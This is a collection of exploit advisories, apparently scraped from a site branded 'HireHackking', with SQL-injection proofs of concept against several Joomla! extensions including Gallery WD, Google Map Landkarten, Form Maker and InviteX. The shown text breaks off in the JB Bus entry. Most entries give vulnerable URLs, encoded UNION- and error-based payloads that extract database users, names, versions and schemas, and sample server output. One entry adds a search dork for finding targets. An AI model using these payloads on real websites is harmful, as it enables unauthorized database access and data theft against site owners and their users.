TM5JTJjJTMwJTc4JTMyJTM4JTMzJTMxJTMzJTMwJTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTMxJTMzJTMxJTMyJTM5JTI5JTJkJTJkJTIwJTJk
# 
# MSsvKiEwNjY2NlVOSU9OKi8oLyohMDY2NjZTRUxFQ1QqLyUzMCU3OCUzMiUzOCUzMyUzMSUzMiUzOSxDT05DQVRfV1MoMHgyMDNhMjAsVVNFUigpLERBVEFCQVNFKCksVkVSU0lPTigpKSwlMzAlNzglMzIlMzglMzMlMzMlMzIlMzksJTMwJTc4JTMyJTM4JTMzJTM0JTMyJTM5LCUzMCU3OCUzMiUzOCUzMyUzNSUzMiUzOSwlMzAlNzglMzIlMzglMzMlMzYlMzIlMzksJTMwJTc4JTMyJTM4JTMzJTM3JTMyJTM5LCUzMCU3OCUzMiUzOCUzMyUzOCUzMiUzOSwlMzAlNzglMzIlMzglMzMlMzklMzIlMzksJTMwJTc4JTMyJTM4JTMzJTMxJTMzJTMwJTMyJTM5LCUzMCU3OCUzMiUzOCUzMyUzMSUzMyUzMSUzMiUzOSktLSst
# 
# # # #
HireHackking 
# # # #
# Exploit Title: Joomla! Component AllVideos Reloaded 1.2.x - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://allvideos.fritz-elfert.de
# Software Link: http://joomlacode.org/gf/project/allvideos15/frs/?action=FrsReleaseBrowse&frs_package_id=3564
# Version: 1.2.x
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5990
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_avreloaded&view=popup&Itemid=55&divid=[SQL]
#  
# JTJkJTZkJTc5JTcwJTZmJTcwJTc1JTcwJTI3JTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTIwJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJkJTJkJTIwJTJk
# 
# # # #
HireHackking 
# # # #
# Exploit Title: Joomla! Component Aist <= 2.0 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://aist.bmstu.ru/
# Software Link: http://aist.bmstu.ru/
# Version: <= 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5993
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_aist&view=showvacancy&id=[SQL]
#  
# JTJkJTMxJTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTIwJTMxJTJjJTMyJTJjJTMzJTJjJTM0JTJjJTM1JTJjJTM2JTJjJTM3JTJjJTM4JTJjJTM5JTJjJTMxJTMwJTJjJTMxJTMxJTJjJTMxJTMyJTJjJTMxJTMzJTJjJTMxJTM0JTJjJTMxJTM1JTJjJTMxJTM2JTJjJTMxJTM3JTJjJTMxJTM4JTJjJTMxJTM5JTJjJTMyJTMwJTJjJTMyJTMxJTJjJTMyJTMyJTJjJTMyJTMzJTJjJTMyJTM0JTJjJTMyJTM1JTJjJTMyJTM2JTJjJTMyJTM3JTJjJTMyJTM4JTJjJTMyJTM5JTJjJTMzJTMwJTJjJTMzJTMxJTJjJTMzJTMyJTJjJTMzJTMzJTJjJTMzJTM0JTJjJTMzJTM1JTJjJTMzJTM2JTJkJTJkJTIwJTJk
# 
# # # #




https://kcst.bmstu.ru/forums/index.php?topic=1213.0
http://aist.bmstu.ru/
АИСТ выполнена в виде компонента для системы управления контентом CMS Joomla! 1.5. и представляет собой подсистему веб-сайта центра (службы) содействия трудоустройству выпускников или образовательного учреждения.
AIST is implemented as a component for the content management system CMS Joomla! 1.5. and is a subsystem of the website of the center (service) to promote the employment of graduates or an educational institution.
HireHackking 
# # # #
# Exploit Title: Joomla! Component Fastball 2.5 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://www.fastballproductions.com/
# Software Link: http://www.fastballproductions.com/
# Version: 2.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6373
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_fastball&view=player&season=[SQL]
#  
# JTMyJTI5JTIwJTQxJTRlJTQ0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTMxJTM0JTMxJTM3JTIwJTQ2JTUyJTRmJTRkJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQzJTRmJTU1JTRlJTU0JTI4JTJhJTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTMxJTM0JTMxJTM3JTNkJTMxJTM0JTMxJTM3JTJjJTMxJTI5JTI5JTI5JTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTQ2JTRjJTRmJTRmJTUyJTI4JTUyJTQxJTRlJTQ0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUwJTRjJTU1JTQ3JTQ5JTRlJTUzJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5JTJkJTJkJTIwJTY3JTc0JTZhJTcz
# 
# # # #

inurl:index.php?option=com_fastball season
HireHackking 
# # # #
# Exploit Title: Joomla! Component File Download Tracker 3.0 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://techsolsystem.com/
# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/downloads/file-download-tracker/
# Version: 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6004
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?dynfield[phone]=[SQL]&option=com_dtracker&task=save
#  
# JTI1JTI3JTIwJTQxJTRlJTQ0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTM0JTMzJTMyJTMzJTIwJTQ2JTUyJTRmJTRkJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQzJTRmJTU1JTRlJTU0JTI4JTJhJTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM0JTMzJTMyJTMzJTNkJTM0JTMzJTMyJTMzJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTQ2JTRjJTRmJTRmJTUyJTI4JTUyJTQxJTRlJTQ0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUwJTRjJTU1JTQ3JTQ5JTRlJTUzJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5JTIwJTQxJTRlJTQ0JTI3JTI1JTI3JTNkJTI3
#  
# 2)
# http://localhost/[PATH]/index.php?option=com_dtracker&layout=download&sess=[SQL]
#  
# JTMxJTI3JTIwJTYxJTZlJTY0JTI4JTczJTY1JTZjJTY1JTYzJTc0JTIwJTMxJTIwJTQ2JTUyJTRmJTRkJTI4JTczJTY1JTZjJTY1JTYzJTc0JTIwJTYzJTZmJTc1JTZlJTc0JTI4JTJhJTI5JTJjJTYzJTZmJTZlJTYzJTYxJTc0JTI4JTI4JTczJTY1JTZjJTY1JTYzJTc0JTIwJTI4JTczJTY1JTZjJTY1JTYzJTc0JTIwJTYzJTZmJTZlJTYzJTYxJTc0JTI4JTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTMwJTc4JTMyJTM3JTJjJTMwJTc4JTM3JTY1JTI5JTI5JTIwJTQ2JTUyJTRmJTRkJTIwJTY5JTZlJTY2JTZmJTcyJTZkJTYxJTc0JTY5JTZmJTZlJTVmJTczJTYzJTY4JTY1JTZkJTYxJTJlJTc0JTYxJTYyJTZjJTY1JTczJTIwJTRjJTQ5JTRkJTQ5JTU0JTIwJTMwJTJjJTMxJTI5JTJjJTY2JTZjJTZmJTZmJTcyJTI4JTcyJTYxJTZlJTY0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTY5JTZlJTY2JTZmJTcyJTZkJTYxJTc0JTY5JTZmJTZlJTVmJTczJTYzJTY4JTY1JTZkJTYxJTJlJTc0JTYxJTYyJTZjJTY1JTczJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5JTJkJTJkJTIwJTJk
#  
# # # #
HireHackking 
# # # # 
# Exploit Title: Joomla! Component Gallery WD 1.3.6 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: https://web-dorado.com/
# Software Link: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd/
# Software Download: https://web-dorado.com/?option=com_wdsubscriptions&view=dwnldfree&format=row&id=162
# Version: 1.3.6
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5981
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_gallery_wd&tag_id=&view=GalleryBox&gallery_id=7[SQL]
# 
# JTM3JTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTM3JTMwJTM5JTMyJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM3JTMwJTM5JTMyJTNkJTM3JTMwJTM5JTMyJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5
# 
# 2)
# http://localhost/[PATH]/index.php?option=com_gallery_wd&tag_id=[SQL]&view=GalleryBox&gallery_id=7
# 
# JTI4JTU1JTUwJTQ0JTQxJTU0JTQ1JTU4JTRkJTRjJTI4JTMxJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTMyJTY1JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTMyJTNkJTMyJTJjJTMxJTI5JTI5JTI5JTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTI5JTJjJTM4JTM1JTM5JTM5JTI5JTI5
# 
# # # #


http://localhost/Joomla375/index.php?option=com_gallery_wd&tag_id=(UPDATEXML(1,CONCAT(0x2e,database(),(SELECT (ELT(2=2,1))),version()),8599))&view=GalleryBox &gallery_id=7
1105 XPATH syntax error: 'joomla375110.1.21-MariaDB' 

http://localhost/Joomla375/index.php?option=com_gallery_wd&tag_id=&view=GalleryBox&gallery_id=%37%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%37%30%39%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%37%30%39%32%3d%37%30%39%32%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29
1105 XPATH syntax error: '\10.1.21-MariaDB1joomla375'
HireHackking 
# # # #
# Exploit Title: Joomla! Component Google Map Landkarten <= 4.2.3 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://www.joomla-24.de/
# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/google-map-landkarten/
# Software Download: http://www.joomla-24.de/download/send/9-komponenten/85-google-map-landkarten
# Version: <= 4.2.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6396
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=[SQL]&id=1&format=raw
# 
# MScrLyohMDMzMzNVTklPTiovKy8qITAzMzMzQUxMKi8rLyohMDMzMzNTRUxFQ1QqLytudUxsLG51TGwsbnVMbCxudUxsLG51TGwsbnVMbCxudUxsLG51TGwsLyohMDMzMzNDT05DQVQqLygoLyohMDMzMzNTRUxFQ1QqLyhAeCkvKiEwMzMzM0ZST00qLygvKiEwMzMzM1NFTEVDVCovKEB4Oj0weDAwKSwoQE5SOj0wKSwoLyohMDMzMzNTRUxFQ1QqLygwKS8qITAzMzMzRlJPTSovKElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMpLyohMDMzMzNXSEVSRSovKFRBQkxFX1NDSEVNQSE9MHg2OTZlNjY2ZjcyNmQ2MTc0Njk2ZjZlNWY3MzYzNjg2NTZkNjEpLyohMDMzMzNBTkQqLygweDAwKUlOKEB4Oj0vKiEwMzMzM0NPTkNBVCovKEB4LExQQUQoQE5SOj1ATlIlMmIxLDQsMHgzMCksMHgzYTIwLHRhYmxlX25hbWUsMHgzYzYyNzIzZSkpKSl4KSksbnVMbCxudUxsLS0rVmVyQXlhcmk=
# 
# MScrLyohMDc3NzdVTklPTiovKy8qITA3Nzc3QUxMKi8rLyohMDc3NzdTRUxFQ1QqLytudUxsLG51TGwsbnVMbCxudUxsLG51TGwsbnVMbCxudUxsLC8qITA3Nzc3Q09OQ0FUKi8oKC8qITA3Nzc3U0VMRUNUKi8oQHgpRlJPTShTRUxFQ1QoQHg6PTB4MDApLChATlI6PTApLCgvKiEwNzc3N1NFTEVDVCovKDApLyohMDc3NzdGUk9NKi8oSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUykvKiEwNzc3N1dIRVJFKi8oVEFCTEVfU0NIRU1BIT0weDY5NmU2NjZmNzI2ZDYxNzQ2OTZmNmU1ZjczNjM2ODY1NmQ2MSkvKiEwNzc3N0FORCovKDB4MDApSU4oQHg6PS8qITA3Nzc3Q09OQ0FUKi8oQHgsTFBBRChATlI6PUBOUiUyYjEsNCwweDMwKSwweDNhMjAsdGFibGVfbmFtZSwweDNjNjI3MjNlKSkpKXgpKSxudUxsLG51TGwsbnVMbCxudUxsLS0rVmVyQXlhcmk=
# 
# 2)
# http://localhost/[PATH]/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1&id=[SQL]&format=raw
# 
# JTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQzJTQxJTUzJTQ1JTIwJTU3JTQ4JTQ1JTRlJTIwJTI4JTMyJTM2JTMxJTMwJTNkJTMyJTM2JTMxJTMwJTI5JTIwJTU0JTQ4JTQ1JTRlJTIwJTMyJTM2JTMxJTMwJTIwJTQ1JTRjJTUzJTQ1JTIwJTMyJTM2JTMxJTMwJTJhJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTMyJTM2JTMxJTMwJTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUwJTRjJTU1JTQ3JTQ5JTRlJTUzJTI5JTIwJTQ1JTRlJTQ0JTI5JTI5JTI2JTY2JTZmJTcyJTZkJTYxJTc0JTNkJTcyJTYxJTc3
# 
# MStBTkQrRVhUUkFDVFZBTFVFKDQ4NTUsQ09OQ0FUKDB4NWMsKFNFTEVDVCtHUk9VUF9DT05DQVQoc2NoZW1hX25hbWUrU0VQQVJBVE9SKzB4M2M2MjcyM2UpK0ZST00rSU5GT1JNQVRJT05fU0NIRU1BLlNDSEVNQVRBKSwoU0VMRUNUKyhFTFQoNDg1NT00ODU1LDEpKSksQ09OQ0FUX1dTKDB4MjAzYTIwLFVTRVIoKSxEQVRBQkFTRSgpLFZFUlNJT04oKSkpKQ==
# 
# 3)
# http://localhost/[PATH]/index.php?option=com_gmap&view=gm_modal&tmpl=component&layout=default&map=[SQL]
# 
# JTI3JTIwJTJmJTJhJTIxJTMwJTM4JTM4JTM4JTM4JTQxJTRlJTQ0JTJhJTJmJTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTM2JTM2JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTI4JTJmJTJhJTIxJTMwJTM4JTM4JTM4JTM4JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTIwJTQ3JTUyJTRmJTU1JTUwJTVmJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTczJTYzJTY4JTY1JTZkJTYxJTVmJTZlJTYxJTZkJTY1JTIwJTUzJTQ1JTUwJTQxJTUyJTQxJTU0JTRmJTUyJTIwJTMwJTc4JTMzJTYzJTM2JTMyJTM3JTMyJTMzJTY1JTI5JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUzJTQzJTQ4JTQ1JTRkJTQxJTU0JTQxJTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM0JTM3JTM2JTMyJTNkJTM0JTM3JTM2JTMyJTJjJTMxJTI5JTI5JTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTI5JTI5JTJkJTJkJTIwJTU2JTY1JTcyJTQxJTc5JTYxJTcyJTY5
# 
# MScgQU5EIChTRUxFQ1QgMjk1OCBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoKFNFTEVDVCAoRUxUKDI5NTg9Mjk1OCwxKSkpLENPTkNBVF9XUygweDIwM2EyMCxVU0VSKCksREFUQUJBU0UoKSxWRVJTSU9OKCkpLEZMT09SKFJBTkQoMCkqMikpeCBGUk9NIElORk9STUFUSU9OX1NDSEVNQS5QTFVHSU5TIEdST1VQIEJZIHgpYSktLStWZXJBeWFyaQ==
# 
# # # #

 
http://localhost/Joomla375/index.php?option=com_gmap&view=gm_modal&tmpl=component&layout=default&map='+/*!08888AND*/+EXTRACTVALUE(66,CONCAT(0x5c,(/*!08888SELECT*/+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),(SELECT+(ELT(4762=4762,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))--+VerAyari
1105 XPATH syntax error: '\bahistanitim<br>cmslite<br>doct' 

http://localhost/Joomla375/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1' AND (SELECT 6142 FROM(SELECT COUNT(*),CONCAT(0x494853414e2053454e43414e,(SELECT (ELT(6142=6142,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ptYA&id=1&format=raw
1062 Duplicate entry 'IHSAN SENCAN1root@localhost : joomla375 : 10.1.21-MariaDB1' for key 'group_key' 

http://localhost/Joomla375/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1&id=1+AND+EXTRACTVALUE(4855,CONCAT(0x5c,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),(SELECT+(ELT(4855=4855,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))&format=raw
1105 XPATH syntax error: '\qpjkq1root@localhost : joomla37'
HireHackking 
# # # #
# Exploit Title: Joomla! Component Form Maker 3.6.12 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://demo.web-dorado.com/
# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/form-maker/
# Version: 3.6.12
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5991
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_formmaker&view=stats&id=[SQL]
#  
# JTMxJTI3JTIwJTIwJTU1JTRlJTQ5JTRmJTRlJTIwJTQxJTRjJTRjJTIwJTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQ3JTUyJTRmJTU1JTUwJTVmJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTczJTYzJTY4JTY1JTZkJTYxJTVmJTZlJTYxJTZkJTY1JTIwJTUzJTQ1JTUwJTQxJTUyJTQxJTU0JTRmJTUyJTIwJTMwJTc4JTMzJTYzJTM2JTMyJTM3JTMyJTMzJTY1JTI5JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUzJTQzJTQ4JTQ1JTRkJTQxJTU0JTQxJTI5JTJkJTJkJTIwJTJkJTIw
# 
# 2)
# http://localhost/[PATH]/index.php?option=com_formmaker&view=stats&form_id=1&id=1&from=[SQL]
#  
# JTIwJTYzJTZmJTc1JTZlJTc0JTI4JTJhJTI5JTY2JTcyJTZmJTZkJTI4JTY5JTZlJTY2JTZmJTcyJTZkJTYxJTc0JTY5JTZmJTZlJTVmJTczJTYzJTY4JTY1JTZkJTYxJTJlJTYzJTZmJTZjJTc1JTZkJTZlJTczJTI5JTc3JTY4JTY1JTcyJTY1JTQwJTNhJTNkJTY1JTc4JTcwJTZmJTcyJTc0JTVmJTczJTY1JTc0JTI4JTM1JTJjJTY1JTc4JTcwJTZmJTcyJTc0JTVmJTczJTY1JTc0JTI4JTM1JTJjJTQwJTJjJTc0JTYxJTYyJTZjJTY1JTVmJTZlJTYxJTZkJTY1JTJjJTMwJTc4JTMzJTYzJTM2JTYzJTM2JTM5JTMzJTY1JTJjJTMyJTI5JTJjJTYzJTZmJTZjJTc1JTZkJTZlJTVmJTZlJTYxJTZkJTY1JTJjJTMwJTc4JTYxJTMzJTYxJTJjJTMyJTI5JTI5JTJjJTQwJTJjJTMyJTI5JTI5JTJkJTJkJTIwJTJkJTIw
# 
# 3)
# http://localhost/[PATH]/index.php?option=com_formmaker&view=stats&form_id=1&id=1&to=[SQL]
#  
# JTMxJTI3JTIwJTIwJTU1JTRlJTQ5JTRmJTRlJTIwJTQxJTRjJTRjJTIwJTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQ3JTUyJTRmJTU1JTUwJTVmJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTc0JTYxJTYyJTZjJTY1JTVmJTZlJTYxJTZkJTY1JTIwJTUzJTQ1JTUwJTQxJTUyJTQxJTU0JTRmJTUyJTIwJTMwJTc4JTMzJTYzJTM2JTMyJTM3JTMyJTMzJTY1JTI5JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTU0JTQxJTQyJTRjJTQ1JTUzJTIwJTU3JTQ4JTQ1JTUyJTQ1JTIwJTU0JTQxJTQyJTRjJTQ1JTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTNkJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTI5JTJkJTJkJTIwJTJk
# 
# # # #





1
http://localhost/Joomla375/index.php?option=com_formmaker&view=stats&id=1'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+- 
root@localhost : joomla375 : 10.1.21-MariaDB

2
http://localhost/Joomla375/index.php?option=com_formmaker&view=stats&form_id=1&id=1&from=1%27%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d%20
root@localhost : joomla375 : 10.1.21-MariaDB

3
http://localhost/Joomla375/index.php?option=com_formmaker&view=stats&form_id=1&id=1&to=1%27%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d%20
root@localhost : joomla375 : 10.1.21-MariaDB
HireHackking 
# # # #
# Exploit Title: Joomla! Component InviteX 3.0.5 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://techjoomla.com/
# Software Link: https://extensions.joomla.org/extensions/extension/content-sharing/bookmark-a-recommend/invitex/
# Version: 3.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6394
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_invitex&view=invites&invite_type=[SQL]&invite_anywhere=1
#  
# JTJkJTM4JTM3JTM3JTM4JTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTIwJTMxJTJjJTMyJTJjJTMzJTJjJTM0JTJjJTM1JTJjJTM2JTJjJTM3JTJjJTM4JTJjJTM5JTJjJTMxJTMwJTJjJTMxJTMxJTJjJTMxJTMyJTJjJTMxJTMzJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTMxJTM1JTJjJTMxJTM2JTJjJTMxJTM3JTJjJTMxJTM4JTJjJTMxJTM5JTJkJTJkJTIwJTJk
#  
# # # #
HireHackking 
# # # #
# Exploit Title: Joomla! Component JB Bus 2.3 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://joombooking.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jbtransport/
# Version: 2.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6372
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_bookpro&view=orderdetail&order_number=[SQL]
#  
